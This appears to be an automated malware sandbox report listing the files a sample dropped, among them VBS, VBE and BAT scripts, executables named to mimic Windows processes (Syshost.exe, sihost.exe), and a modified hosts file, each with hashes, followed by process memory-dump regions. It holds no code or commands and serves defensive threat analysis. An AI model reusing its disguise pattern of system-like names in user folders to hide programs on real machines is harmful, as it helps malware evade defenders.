7819340774f9d853a506241876ec302cc05a4aa7ea021c54de786ffe0832cf97f9e503029d3cf80160b25a821597b33efa8cf0e950ab0ab0a75255957eda31e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\5f13418a-d4c3-4af4-8c28-c9a5ae91091d.vbs
Filesize
481B

MD5
6f9db2998e0f9363dcb8bd3aba155c3b

SHA1
50ac8df491ce4c719fc90089745d00fae836d5da

SHA256
b5a99ccb518486d50e5585f48519cbdce5cb796fbb80657ed02ac10d01b47fbf

SHA512
7819340774f9d853a506241876ec302cc05a4aa7ea021c54de786ffe0832cf97f9e503029d3cf80160b25a821597b33efa8cf0e950ab0ab0a75255957eda31e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\5f13418a-d4c3-4af4-8c28-c9a5ae91091d.vbs
Filesize
481B

MD5
6f9db2998e0f9363dcb8bd3aba155c3b

SHA1
50ac8df491ce4c719fc90089745d00fae836d5da

SHA256
b5a99ccb518486d50e5585f48519cbdce5cb796fbb80657ed02ac10d01b47fbf

SHA512
7819340774f9d853a506241876ec302cc05a4aa7ea021c54de786ffe0832cf97f9e503029d3cf80160b25a821597b33efa8cf0e950ab0ab0a75255957eda31e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\610e3479-09b1-4bf1-85ce-24b1c9b675bb.vbs
Filesize
704B

MD5
9fe878d1e16d4e9d07c651aa3a440586

SHA1
a8a1a907c592fcec7836112b0bbe5223bc30f09c

SHA256
e4c2bd96c226b2aa94d2338903745ee21ecd04f9ccadf21cfbb6ad68e17742de

SHA512
5574b7cfff33bead63ae99c2e58d14098cf93a4843d937af4d39fb02fa2b5202a2c2ced0653d76c5e640cc49492c111f3618f680da1154b459ddebffa63702f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\888d49a2-d628-4fd0-9619-f011d50b65cf.vbs
Filesize
705B

MD5
8f665ad01fb47a564a4f8afbbba5fdd3

SHA1
80688e2fbccae95067a0468ff563dc3d5994c95b

SHA256
3b27b21f4f3039a119dfddf406d587fe174410903683dacb0e9fb37815ce1c07

SHA512
9010bd2e1c51fdb9ae5e4070b444cefe89cfff83a92839b6c9d37988859f846490e5a869df958d6fe83060f6e0caac356e9a966f798eada5495b32372ba6218a

Download Submit
C:\Users\Admin\AppData\Local\Temp\LicOutput.exe
Filesize
2.0MB

MD5
fc9ea28a3c3659c4200e442d20198458

SHA1
79ede873cd08d5941e54524dd85b5add0a79bd7c

SHA256
51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0

SHA512
c2357a0eb6fd31929af57c544be2de14b0daee2a731ec09e586b0ac748b7368ae5a022d0d8dae0ccece0fa860799a0da02405f60d86a963e177508b5e4220a17

Download Submit
C:\Users\Admin\AppData\Local\Temp\LicOutput.exe
Filesize
2.0MB

MD5
fc9ea28a3c3659c4200e442d20198458

SHA1
79ede873cd08d5941e54524dd85b5add0a79bd7c

SHA256
51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0

SHA512
c2357a0eb6fd31929af57c544be2de14b0daee2a731ec09e586b0ac748b7368ae5a022d0d8dae0ccece0fa860799a0da02405f60d86a963e177508b5e4220a17

Download Submit
C:\Users\Admin\AppData\Local\Temp\LicOutput.exe
Filesize
2.0MB

MD5
fc9ea28a3c3659c4200e442d20198458

SHA1
79ede873cd08d5941e54524dd85b5add0a79bd7c

SHA256
51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0

SHA512
c2357a0eb6fd31929af57c544be2de14b0daee2a731ec09e586b0ac748b7368ae5a022d0d8dae0ccece0fa860799a0da02405f60d86a963e177508b5e4220a17

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bu1t3r12.bbe.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\zt3JT3T8RF.bat
Filesize
194B

MD5
1fd3eb8db5a6b98a2dc0b614969a9602

SHA1
fc9ed95167a4719d31a3e1175bd69d19b8db3fc9

SHA256
2b34118e8c46bcba7ea18faabbf49f57a9e22e09c3d90b1ca6c18fc1cee5fa9f

SHA512
9571536d5d56f5174aea23742c96295d79cc6566ffddb4fa693368ffc616934678f85067b7cdd409b1155b331819ae51474c9682fc1a8db2124540d393cadc29

Download Submit
C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe
Filesize
629.6MB

MD5
fc208f740519550f24f8ffbf174d992b

SHA1
9e0ec80e31093886a1600def82a6fcb12f91d055

SHA256
fd027242484753facaadb89d3020811e76ed34230ff893c115f7b8824c2f5131

SHA512
05a0264472eba1a3f96c5d87e9f46624e1cf18f7ab2e26fc43053714b3d306f260455a37e9fef1f11b837715ce0d61119e349df11d5465e0ddef0a106e94b9c1

Download Submit
C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe
Filesize
629.6MB

MD5
fc208f740519550f24f8ffbf174d992b

SHA1
9e0ec80e31093886a1600def82a6fcb12f91d055

SHA256
fd027242484753facaadb89d3020811e76ed34230ff893c115f7b8824c2f5131

SHA512
05a0264472eba1a3f96c5d87e9f46624e1cf18f7ab2e26fc43053714b3d306f260455a37e9fef1f11b837715ce0d61119e349df11d5465e0ddef0a106e94b9c1

Download Submit
C:\Users\Admin\AppData\Roaming\LicCheck.exe
Filesize
2.9MB

MD5
97824a1a018a194220866d5548eeff95

SHA1
35538496cf8c2761fc44f2d5f58882cda4d78400

SHA256
07df13bc321083e74a3512b9861332e566c8d2ff201a3a5c8fcd2fd9fc8bfef6

SHA512
754576ae3794dda1d9a86f87369f5cb3a4f951fbbb9e81560a8cd056e603c81a8b9ae644802a5a81d6e263608fdbd371fb9056cf8b6ea1e7e1e42b4c02e13aed

Download Submit
C:\Users\Admin\AppData\Roaming\LicCheck.exe
Filesize
2.9MB

MD5
97824a1a018a194220866d5548eeff95

SHA1
35538496cf8c2761fc44f2d5f58882cda4d78400

SHA256
07df13bc321083e74a3512b9861332e566c8d2ff201a3a5c8fcd2fd9fc8bfef6

SHA512
754576ae3794dda1d9a86f87369f5cb3a4f951fbbb9e81560a8cd056e603c81a8b9ae644802a5a81d6e263608fdbd371fb9056cf8b6ea1e7e1e42b4c02e13aed

Download Submit
C:\Users\Admin\AppData\Roaming\LicCheck.exe
Filesize
2.9MB

MD5
97824a1a018a194220866d5548eeff95

SHA1
35538496cf8c2761fc44f2d5f58882cda4d78400

SHA256
07df13bc321083e74a3512b9861332e566c8d2ff201a3a5c8fcd2fd9fc8bfef6

SHA512
754576ae3794dda1d9a86f87369f5cb3a4f951fbbb9e81560a8cd056e603c81a8b9ae644802a5a81d6e263608fdbd371fb9056cf8b6ea1e7e1e42b4c02e13aed

Download Submit
C:\Users\Admin\AppData\Roaming\LicGet.exe
Filesize
3.6MB

MD5
279c66b28f19a510ad6c0f155871fac3

SHA1
427bcf049de4b9a848593463e0f36265baa6164c

SHA256
ae0b0d973a8b3feff1fb7570e09fadf473b904b8bb53c7eb83da63a53c103164

SHA512
f9ae2f0753e689f78ced7d1dbc4273fe17ca1eda2f62ee7a317a4a3614d91fcae62d7aacb8ea1a826f7e0a5a3c5723dc48830483af8e38497bc9593bd2f7f161

Download Submit
C:\Users\Admin\AppData\Roaming\LicGet.exe
Filesize
3.6MB

MD5
279c66b28f19a510ad6c0f155871fac3

SHA1
427bcf049de4b9a848593463e0f36265baa6164c

SHA256
ae0b0d973a8b3feff1fb7570e09fadf473b904b8bb53c7eb83da63a53c103164

SHA512
f9ae2f0753e689f78ced7d1dbc4273fe17ca1eda2f62ee7a317a4a3614d91fcae62d7aacb8ea1a826f7e0a5a3c5723dc48830483af8e38497bc9593bd2f7f161

Download Submit
C:\Users\Admin\AppData\Roaming\LicGet.exe
Filesize
3.6MB

MD5
279c66b28f19a510ad6c0f155871fac3

SHA1
427bcf049de4b9a848593463e0f36265baa6164c

SHA256
ae0b0d973a8b3feff1fb7570e09fadf473b904b8bb53c7eb83da63a53c103164

SHA512
f9ae2f0753e689f78ced7d1dbc4273fe17ca1eda2f62ee7a317a4a3614d91fcae62d7aacb8ea1a826f7e0a5a3c5723dc48830483af8e38497bc9593bd2f7f161

Download Submit
C:\Users\Admin\AppData\Roaming\Syshost.exe
Filesize
4.6MB

MD5
2b3bff5880cb5d9ab44c302bd1047313

SHA1
8cf83c7e71254a6ca5d40d58470897479c49e4c3

SHA256
e65f40ce3d58d2634807945b468acf0fbc3f6b06631d499dcd99536ed4fae4bc

SHA512
c3d46ca94eb85db7614f0c9ad57d5ab2afe380e5ae57b6967795d285936ee9133439010ddd3bd28267e203bb396062192cd3398092e2f37f46fa2be5aff426b4

Download Submit
C:\Users\Admin\AppData\Roaming\Syshost.exe
Filesize
4.6MB

MD5
2b3bff5880cb5d9ab44c302bd1047313

SHA1
8cf83c7e71254a6ca5d40d58470897479c49e4c3

SHA256
e65f40ce3d58d2634807945b468acf0fbc3f6b06631d499dcd99536ed4fae4bc

SHA512
c3d46ca94eb85db7614f0c9ad57d5ab2afe380e5ae57b6967795d285936ee9133439010ddd3bd28267e203bb396062192cd3398092e2f37f46fa2be5aff426b4

Download Submit
C:\Users\Admin\AppData\Roaming\Syshost.exe
Filesize
4.6MB

MD5
2b3bff5880cb5d9ab44c302bd1047313

SHA1
8cf83c7e71254a6ca5d40d58470897479c49e4c3

SHA256
e65f40ce3d58d2634807945b468acf0fbc3f6b06631d499dcd99536ed4fae4bc

SHA512
c3d46ca94eb85db7614f0c9ad57d5ab2afe380e5ae57b6967795d285936ee9133439010ddd3bd28267e203bb396062192cd3398092e2f37f46fa2be5aff426b4

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
4KB

MD5
44b39e703bab7aad028e158105f5e0d0

SHA1
82c0062469857696c6a430496309a139eb0aaab6

SHA256
81c911e61e702a3f7561617da73cffd35d7dedab8325153260a6c4769e6907aa

SHA512
30004b7fdf4a3f65d45bf6c4f118ffe09fde14248532437abbbdc6e417657b86fa3cea5c9d171505d47eb480c7dbdc2492f444c7fd8a472012a3061fe197ab62

Download Submit
C:\agentBrowsersavesRefBroker\DYj6G9.bat
Filesize
48B

MD5
5bb1a4946c35c47dd502dfbcd6d3a3d7

SHA1
1e1e42c5996031e92e8314c45201ccbf1fa23607

SHA256
30921e7d9a89121e8d56de5182e7e487f8e02293e82e82c2c04a6a537150ef06

SHA512
87a63b9f407a21db0cc2d80e3b639833e5e9f790790a9fc69a65788b193af80e19717ac4dc449190cc69817b161aabaf4a9c338e8936c6907adf5c432f7156e1

Download Submit
C:\agentBrowsersavesRefBroker\RCX1DAF.tmp
Filesize
1.7MB

MD5
7b4c52ffeb62388ae9e4174771f90bd4

SHA1
282d38d6a974055e24c27190d22331ebc9643b45

SHA256
4838b46a55389d775b77ec76898d4520cb420fa74a1a8a964a5375af51b53d8c

SHA512
8189bb7627909c9c2fc0ce79d6c0dca41777c50637e30e194dbe5699e514799877a3dd09bb0ceeb717401d2ecda3a93ba39d8d9d3c4ed15c1ef11c02b6f47ea1

Download Submit
C:\agentBrowsersavesRefBroker\SurrogateDll.exe
Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\SurrogateDll.exe
Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\metokn3Gpa5i.vbe
Filesize
209B

MD5
22bdc192d231db2480148ba60871353b

SHA1
511712d83287343407b489ffbba56f1543062496

SHA256
442844f37559614e588adbd17a56c93e76687efdc6757a8aa0510e87b5a9fd22

SHA512
b7f044b2e707f474d7b5cba6fd4dd484debd04a7f7a80b81d81a1a9b49c8f85746804f5382770b338bdaf2471b09734deb5b0fdf30daa82e610435418866e444

Download Submit
C:\agentBrowsersavesRefBroker\sihost.exe
Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
memory/392-174-0x00000224B0E20000-0x00000224B0E30000-memory.dmp

Filesize
64KB

Download
memory/392-145-0x00000224B0E20000-0x00000224B0E30000-memory.dmp

Filesize
64KB

Download
memory/392-144-0x00000224CC150000-0x00000224CC172000-memory.dmp

Filesize
136KB

Download
memory/392-146-0x00000224B0E20000-0x00000224B0E30000-memory.dmp

Filesize
64KB

Download
memory/392-175-0x00000224B0E20000-0x00000224B0E30000-memory.dmp

Filesize
64KB

Download
memory/448-198-0x00007FF72FB30000-0x00007FF72FECA000-memory.dmp

Filesize
3.6MB

Download
memory/448-235-0x00007FF72FB30000-0x00007FF72FECA000-memory.dmp

Filesize
3.6MB

Download
memory/756-493-0x000001A1E54F0000-0x000001A1E5500000-memory.dmp

Filesize
64KB

Download
memory/756-506-0x000001A1E54F0000-0x000001A1E5500000-memory.dmp

Filesize
64KB

Download
memory/1432-466-0x0000013F7EB20000-0x0000013F7EB30000-memory.dmp

Filesize
64KB

Download
memory/1432-512-0x0000013F7EB20000-0x0000013F7EB30000-memory.dmp

Filesize
64KB

Download
memory/1636-508-0x0000022F2DD90000-0x0000022F2DDA0000-memory.dmp

Filesize
64KB

Download
memory/1636-490-0x0000022F2DD90000-0x0000022F2DDA0000-memory.dmp

Filesize
64KB

Download
memory/1636-501-0x0000022F2DD90000-0x0000022F2DDA0000-memory.dmp

Filesize
64KB

Download
memory/1700-509-0x0000027136450000-0x0000027136460000-memory.dmp

Filesize
64KB

Download
memory/1700-491-0x0000027136450000-0x0000027136460000-memory.dmp

Filesize
64KB

Download
memory/1700-492-0x0000027136450000-0x0000027136460000-memory.dmp

Filesize
64KB

Download
memory/1904-496-0x000002732C8E0000-0x000002732C8F0000-memory.dmp

Filesize
64KB

Download
memory/2292-447-0x000002B15CA20000-0x000002B15CA30000-memory.dmp

Filesize
64KB

Download
memory/2292-446-0x000002B15CA20000-0x000002B15CA30000-memory.dmp

Filesize
64KB

Download
memory/2292-503-0x000002B15CA20000-0x000002B15CA30000-memory.dmp

Filesize
64KB

Download
memory/2616-158-0x0000024226F20000-0x0000024226F30000-memory.dmp

Filesize
64KB

Download
memory/2616-156-0x0000024226F20000-0x0000024226F30000-memory.dmp

Filesize
64KB

Download
memory/2616-157-0x0000024226F20000-0x0000024226F30000-memory.dmp

Filesize
64KB

Download
memory/2620-133-0x0000000000DB0000-0x0000000000DBA000-memory.dmp

Filesize
40KB

Download
memory/3368-197-0x00000194C1790000-0x00000194C17A0000-memory.dmp

Filesize
64KB

Download
memory/3596-489-0x000001A08AB30000-0x000001A08AB40000-memory.dmp

Filesize
64KB

Download
memory/3596-498-0x000001A08AB30000-0x000001A08AB40000-memory.dmp

Filesize
64KB

Download
memory/3636-511-0x0000014EA4590000-0x0000014EA45A0000-memory.dmp

Filesize
64KB

Download
memory/3636-413-0x0000014EA4590000-0x0000014EA45A0000-memory.dmp

Filesize
64KB

Download
memory/3988-230-0x000002CB32120000-0x000002CB32130000-memory.dmp

Filesize
64KB

Download
memory/3988-231-0x000002CB32120000-0x000002CB32130000-memory.dmp

Filesize
64KB

Download
memory/3988-229-0x000002CB32120000-0x000002CB32130000-memory.dmp

Filesize
64KB

Download
memory/4040-507-0x000002E5F7510000-0x000002E5F7520000-memory.dmp

Filesize
64KB

Download
memory/4040-499-0x000002E5F7510000-0x000002E5F7520000-memory.dmp

Filesize
64KB

Download
memory/4040-426-0x000002E5F7510000-0x000002E5F7520000-memory.dmp

Filesize
64KB

Download
memory/4040-420-0x000002E5F7510000-0x000002E5F7520000-memory.dmp

Filesize
64KB

Download
memory/4140-510-0x00000113D76B0000-0x00000113D76C0000-memory.dmp

Filesize
64KB

Download
memory/4140-502-0x00000113D76B0000-0x00000113D76C0000-memory.dmp

Filesize
64KB

Download
memory/4140-414-0x00000113D76B0000-0x00000113D76C0000-memory.dmp

Filesize
64KB

Download
memory/4204-355-0x00000000027D0000-0x00000000027E0000-memory.dmp

Filesize
64KB

Download
memory/4204-249-0x00000000027D0000-0x00000000027E0000-memory.dmp

Filesize
64KB

Download
memory/4204-240-0x0000000000370000-0x0000000000530000-memory.dmp

Filesize
1.8MB

Download
memory/4204-241-0x00000000027D0000-0x00000000027E0000-memory.dmp

Filesize
64KB

Download
memory/4204-356-0x00000000027D0000-0x00000000027E0000-memory.dmp

Filesize
64KB

Download
memory/4204-242-0x0000000002760000-0x00000000027B0000-memory.dmp

Filesize
320KB

Download
memory/4204-282-0x00000000027D0000-0x00000000027E0000-memory.dmp

Filesize
64KB

Download
memory/4204-254-0x000000001CB40000-0x000000001CC40000-memory.dmp

Filesize
1024KB

Download
memory/4204-245-0x000000001CDC0000-0x000000001D2E8000-memory.dmp

Filesize
5.2MB

Download
memory/4204-246-0x00000000027D0000-0x00000000027E0000-memory.dmp

Filesize
64KB

Download
memory/4204-250-0x00000000027D0000-0x00000000027E0000-memory.dmp

Filesize
64KB

Download
memory/4256-495-0x0000020B3D8E0000-0x0000020B3D8F0000-memory.dmp

Filesize
64KB

Download
memory/4256-504-0x0000020B3D8E0000-0x0000020B3D8F0000-memory.dmp

Filesize
64KB

Download
memory/4256-494-0x0000020B3D8E0000-0x0000020B3D8F0000-memory.dmp

Filesize
64KB

Download
memory/4696-558-0x000000001D2C0000-0x000000001D3C0000-memory.dmp

Filesize
1024KB

Download
memory/4696-543-0x000000001B1A0000-0x000000001B1B0000-memory.dmp

Filesize
64KB

Download
memory/4696-542-0x000000001B1A0000-0x000000001B1B0000-memory.dmp

Filesize
64KB

Download
memory/4696-545-0x000000001B1A0000-0x000000001B1B0000-memory.dmp

Filesize
64KB

Download
memory/4696-559-0x000000001D2C0000-0x000000001D3C0000-memory.dmp

Filesize
1024KB

Download
memory/4696-560-0x000000001D2C0000-0x000000001D3C0000-memory.dmp

Filesize
1024KB

Download
memory/4696-555-0x000000001B1A0000-0x000000001B1B0000-memory.dmp

Filesize
64KB

Download
memory/4696-544-0x000000001B1A0000-0x000000001B1B0000-memory.dmp

Filesize
64KB

Download
memory/4784-513-0x000001CF7A9A0000-0x000001CF7A9B0000-memory.dmp

Filesize
64KB

Download
memory/4784-505-0x000001CF7A9A0000-0x000001CF7A9B0000-memory.dmp

Filesize
64KB

Download
memory/5032-500-0x0000016AA52A0000-0x0000016AA52B0000-memory.dmp

Filesize
64KB

Download
memory/5032-457-0x0000016AA52A0000-0x0000016AA52B0000-memory.dmp

Filesize
64KB

Download